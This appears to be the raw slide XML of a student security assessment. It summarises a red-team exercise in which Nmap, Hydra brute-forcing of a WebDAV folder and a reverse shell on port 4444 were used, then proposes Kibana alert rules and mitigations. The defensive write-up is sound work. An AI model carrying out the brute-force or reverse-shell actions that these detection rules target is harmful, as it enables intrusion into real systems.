              <a:t> let’s move on to what we can do about these attacks, both to make them less likely to happen and to alert someone if it looks like one is happening.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DETECTION</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E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>asy and cost-effective fix is to set an alert in Kibana to inform SOC/IT of any sharp increase in connection requests, especially from same IP or geolocation and within seconds.</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PREVENTION</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First a stateful firewall needs to be added to the network. Then this firewall can be configured to respond after an alert is triggered to block additional packets from the source.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Next, because this company’s data would be valuable on the black market and therefore of high interest to hackers, a “honeypot” to redirect suspicious traffic. (consider honeyd for now.)</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Footnote 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> Palo Alto Networks suggests starting with a threshold of 100 scans until a baseline for the company’s regular traffic can be determined.</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Steps to create an alert in Kibana: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From the lefthand menu, choose Management &gt; Watcher &gt; Create new watch &gt; Threshold alert &gt; (enter name, index to be monitored, time field, and how often to run the watch) &gt; Set condition match &gt; Add new action (send an email, text, Slack message, etc.) &gt; TestFire (optional) &gt; Save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See also: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.elastic.co/guide/en/kibana/7.x/alerting-getting-started.html</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Alert 1: HTTP requests for access to secret_folder or to the connect_to_corp_server folder</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Conditions for activating this alert:  </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>More than 1 request, to those URL paths, per minute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 ---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Alert 2:  HTTP requests for access to secret_folder or any password-protected location, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>from an external IP address</a:t>
            </a:r>
            <a:endParaRPr sz="1400" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Conditions for activating this alert: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 ANY requests, to those specific URL paths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PREVENTION:</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Everyone’s password needs to change. Not just Ryan.</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Educate system users about password security, and about disclosure of sensitive data such as file paths/locations.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Remove password hashes from user-accessed locations</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:b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Rewrite public-facing employee info website pages to remove sensitive data (file locations)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Multifactor authentication is when you put in your password and the system says hold on, let’s make sure it’s really you, and either sends a code to your phone, or to your email, or asks you a security question. I used to hate it when Google would do that to me, but I’ve grown to appreciate the protection.</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Alert 1 and alert 2 specifically address the type of attack we did with the information we had, so #2 is specifically looking for “Hydra”</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Alert #3 is a broader watch for other types of brute-force attempts, or even if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>someone’s kid comes to work and tries to hack his way into Dad’s computer terminal by guessing the password.</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Alert 1: HTTP requests for access to secret_folder or webDAV path passwd.dav</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Conditions that would trigger this alarm: More than 2 requests, to those URL paths, per minute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 --- ---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Alert 2:  HTTP requests that contain “Hydra” in the user_agent.original field</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Conditions that would trigger this alert:  1 request, any time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 ---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Alert 3:  unsuccessful login attempts, any user</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Conditions that cause this alert to be triggered: 4 requests, within one minute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a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Conditions that would trigger the first alert on this page = 1 or more instances of this type of request from an unknown IP address. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14"/>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14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I recommend Alert #2  be sent out after ANY instance of this 401 error, at least until the system is further protected against attacks.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Require multi-factor authentication for WebDAV access, without sharing the hashes of the second level in the first!</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Footnote 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> More WebDAV HTTP request methods can be found at:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A7"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.valencynetworks.com/kb/how-to-disable-web-dav-extensions.html</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Footnote 4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> More on WebDAV security:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A7"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A7"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>webdav.io/webdav/webdav-resources/webdav-security</a:t>
            </a:r>
            <a:endParaRPr sz="1400" u="sng">
              <a:solidFill>
                <a:srgbClr val="0097A7"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Footnote 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: This resource on SSL certification is 3 years old but a good place to start: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A7"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.pcmag.com/news/top-ssl-certificates-buyers-guide</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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Alert 1 is watching for: </a:t>
            </a:r>
            <a:endParaRPr i="1"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A company server is the source.IP</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Unknown IP is the destination.IP</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 The traffic is on port 4444</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Conditions for activation: all 3 conditions met, more than one per 15 minutes</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 --- ---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sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Alert 2 is watching for:  </a:t>
            </a:r>
            <a:endParaRPr i="1"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File uploads from outside the company</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Conditions for alert activation: any instance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 ---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sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Alert 3 is watching for:  </a:t>
            </a:r>
            <a:endParaRPr i="1"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File uploads that include the extension .php or .exe or any executable extension</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Conditions for alert activation: any instance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Prevention #1, limit outgoing connectivity to only necessary IP addresses and specifically block unneeded ports that are commonly used for this type of exploit, like 4444 that we saw.</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Prevention #3, if outside IPs even need to upload.maybe vendors or clients</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#4, Educate system users regarding what is executable code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#5 proxy server is like a cross between a lobby and a fake front.The company computers are behind it, and only the proxy server has a public-facing IP address.</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Footnote 6: Resource used for some of the reverse-shell prevention strategies:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A7"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.netsparker.com/blog/web-security/understanding-reverse-shells/</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e2a7d9259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e2a7d9259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All system users must receive training in basic cybersecurity measures they can take to keep company data, and company function, safe. This includes (but not limited to)</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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How to choose secure passwords</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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tips for navigating complex directories/servers</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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Common phishing and social engineering tactics</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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Do’s and Don’ts for security of PII (customer data)</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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>What executable code looks like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e2a7d9259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e2a7d9259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e2a7d9259f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e2a7d9259f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This list puts in priority order what I recommend be done first and so on.</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I chose Medium as the difficulty if someone needs some experience and training to be able to do the job correctly.</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e2a7d9259f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e2a7d9259f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In #6, Add system alerts:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>It’s not difficult to figure out how to add alerts in Kibana -- the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>documentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> is decent, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>depending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> on how familiar the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>person</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> doing it is with reading log files and configuring alerts, the time frame could change. Also to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>considered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> is whether </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>additional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> staff, in house or outsourced, will be needed to properly monitor and respond to the alerts in a timely manner.</a:t>
            </a:r>
            <a:endParaRPr sz="14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e2a7d9259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e2a7d9259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This graph is a risk matrix that factors in both the potential severity of the various vulnerabilities that were found, and the likelihood of them </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>occurring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>. Given that this was an exercise, and there is no data to suggest whether or not any exploits have been tried against Capstone, I chose the second-highest level of likelihood because everything done by the Red Team was simple and readily available, yet that doesn’t mean they’re sure to be attacked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>immediately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.</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One of the ones we’ll look at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>today</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> is of medium severity, two are High, and one falls into the Extremely critical zone, meaning if that vulnerability was exploited for real on the Capstone servers, the company could face loss, corruption, or theft of data, loss of company functionality, could be held for ransom, and also as a company dealing with the public, lose a lot of credibility and trust.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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e2a7d9259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e2a7d9259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2a7d9259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2a7d9259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Let’s start by taking a look at the environment we were working in, from both the attacker side and the Capstone side.</a:t>
            </a:r>
            <a:endParaRPr sz="14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Before you can know how to fix a problem, you have to know what is broken. In this assignment a “Red Team” of penetration testers used their knowledge of common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to see if we could connect to Capstone’s server(s) and find proprietary information. We succeeded, unfortunately quite easily.</a:t>
            </a:r>
            <a:endParaRPr sz="14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The first thing we did was use a command called “Nmap,” which can be run on an IP address, a subnet of IPs, or even a URL aka website name. All this data (and more that we did not need for this assessment) was found with nmap.</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ELK is a mnemonic for a “stack” of products that work together collect, log and interpret data: Elasticsearch, Logstash, and Kibana. This ELK stack was assisted by the following data shippers known as Beats: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Filebeat, Metricbeat, and Packetbeat capture log files, metrics, and network traffic, respectively.</a:t>
            </a:r>
            <a:endParaRPr sz="14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02124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> is the layer of programming that understands and executes the commands a user enters.</a:t>
            </a:r>
            <a:endParaRPr sz="14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400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
